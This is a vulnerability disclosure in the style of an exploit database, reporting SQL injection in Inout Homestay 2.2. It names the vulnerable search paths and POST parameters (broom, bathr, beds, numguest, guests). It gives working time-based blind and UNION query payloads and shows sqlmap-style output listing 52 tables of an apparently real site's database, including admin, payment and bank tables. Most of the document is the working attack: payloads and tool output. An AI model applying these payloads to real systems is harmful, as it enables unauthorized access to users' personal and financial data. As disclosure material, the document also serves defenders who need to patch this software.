┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                  [ Vulnerability ]                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                                                                    :
│  Website  : inoutscripts.com                                                           │
│  Vendor   : Inout Scripts - Nesote Technologies Private Limited                        │
│  Software : Inout Homestay 2.2                                                         │
│  Vuln Type: SQL Injection                                                              │
│  Impact   : Database Access                                                            │
│                                                                                        │
│────────────────────────────────────────────────────────────────────────────────────────│
│                                                                                       ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│ Release Notes:                                                                         │
│ ═════════════                                                                          │
│                                                                                        │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and     │
│ damage to a company's reputation.                                                      │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
       
	CryptoJob (Twitter) twitter.com/CryptozJob
	   
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2023                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /index.php?page=search/searchdetailed

broom=1[Inject-HERE]&bathr=1[Inject-HERE]&beds=1[Inject-HERE]&location=Indianapolis, IN, USA&address=Indianapolis, IN, USA&lat=39.768403&longi=-86.158068&indate=&outdate=&numguest=2[Inject-HERE]&property1=1&property2=7&property3=4&option=1&pstart=all&pend=948&page=1&type=2&type=2&userseachstate=Indiana&userseachcity=Indianapolis

POST parameter 'broom' is vulnerable to SQLI
POST parameter 'bathr' is vulnerable to SQLI
POST parameter 'beds' is vulnerable to SQLI
POST parameter 'numguest' is vulnerable to SQLI


Path: /index.php?page=search/rentals

location=Indianapolis%2C+IN%2C+USA&indate=&outdate=&address=Indianapolis%2C+IN%2C+USA&lat=39.768403&long=-86.158068&guests=2[Inject-HERE]&searchcity=Indianapolis&searchstate=Indiana

POST parameter 'guests' is vulnerable to SQLI

---
Parameter: broom (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: broom=1 AND (SELECT 4813 FROM (SELECT(SLEEP(5)))Pudr)&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split

    Type: UNION query
    Title: Generic UNION query (NULL) - 27 columns
    Payload: broom=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b787a71,0x564451596473794d69586f5a4677435270534b45566a6558734e4f5a72434279645855646f54456f,0x71786a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split
---

[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[INFO] fetching tables for database: '*****_homestay'
Database: *****_homestay

[52 tables]
+----------------------------------+
| admin_account                    |
| admin_payment_details            |
| category_property                |
| chat_details                     |
| chat_messages                    |
| checkout_ipn                     |
| countries                        |
| coupon_detail                    |
| cron_details                     |
| custom_field                     |
| demo_message                     |
| email_details                    |
| email_templates                  |
| forgetpassword                   |
| host_rejected                    |
| inout_ipns                       |
| languages                        |
| list_date_request                |
| list_images                      |
| listing_date                     |
| listing_detail                   |
| listing_main                     |
| message_notify_app               |
| messages                         |
| msg_req_temp                     |
| ppc_currency                     |
| public_side_media_detail         |
| public_slide_images              |
| refund_creditupdate              |
| request_coupon_detail            |
| settings                         |
| superhost_detail                 |
| traveller_bank_deposit_history   |
| traveller_cancellation_modes     |
| traveller_cancelled              |
| user_account_detail              |
| user_address_verify_request      |
| user_details                     |
| user_email_verification          |
| user_listing_request             |
| user_refunddetails               |
| user_registration                |
| user_reviews                     |
| user_search_details              |
| user_settings                    |
| user_wishlist_mapping            |
| user_withdrawal_details          |
| userabusereport                  |
| userbank_pending_listing_request |
| usercancellationsaction          |
| wish_list                        |
| withdrawal_request               |
+----------------------------------+

[-] Done